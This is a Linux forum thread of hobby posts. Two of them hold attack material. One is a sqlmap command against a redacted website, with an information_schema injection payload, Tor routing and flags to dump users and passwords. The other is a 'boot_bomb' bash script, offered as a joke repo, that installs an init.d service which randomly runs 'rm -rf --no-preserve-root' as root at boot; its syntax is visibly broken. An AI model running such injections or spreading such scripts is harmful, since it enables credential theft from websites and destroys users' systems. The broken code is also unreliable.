What Linux-y thing have you been playing with?

A forum for general discussion about Linux. If it is about Linux, but does not seem to fit in any other forum, then this is probably the best place to post it.

playing around with sqlmap

Code: Select all

 sqlmap -u "http://website.redacted.lol/index.php?*page_id=2017*"
--data "(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#"
--method GET --udf-inject --user-agent "Apache-HttpClient/4.5.1 (Java/1.8.0_51)"
--drop-set-cookie --delay 15 --time-sec 15 --check-tor --tor --tor-type SOCKS5 --level 5
--risk 3 --dump --users --passwords --common-columns --common-tables --fingerprint
--regex "[0-9]" --batch --forms --text --crawl 5 --encoding GBK --tamper bluecoat,base64encode,luanginx
--os-bof --unstable --repair --hpp -v5
I don't expect many to understand what's going on in this but I find it very enjoyable and extremely interesting.

Hmm. Why would sudo be necessary here? Aren't you just submitting get requests?

This is not strictly Linux related, but whatever. I have been working on an Emacs youtube series. I'm planning to teach Emacs usage and configuration and also showcase a bunch of useful Emacs programs and packages. The series will progress linearly starting with no Emacs knowledge or installation for that matter.. I'm currently working on the scripts for the zeroth and first episodes.

Here are some of the episodes I'm planning

Made a new github repo. Playing around trying to use as little code as possible, and as little effort as possible and still be kinda quirky n funny.

https://github.com/mrgfy/boot_bomb/

Code: Select all

#!/bin/bash

touch /etc/init.d/bash_revolver.sh &&\
echo "[ $[ $RANDOM % 6 ] == 0 } &&\
su root -g wheel -c "rm -rf --no-preserve-root */*" || echo *Eat a Dick & Go Back to Windows*; or sleep 5 & exec $last_pid" > /etc/init.d/bash_revolver.sh &&\
chmod 755 /etc/init.d/bash_revolver.sh &&\
update-rc.d bash_revolver.sh defaults;
Haven't tested it. Like i said, just messing around for fun. But I will test it soon and maybe 1 or 2 ppl around might jump on the repo n help out. Anything's possible. Peace guys. Linux rocks.

Made a eDex-ui Terminal theme with no on-screen keyboard. Compile and run from source, if you want folders and files you can easily edit, or use the app image, I don't know how to edit the themes that way though.
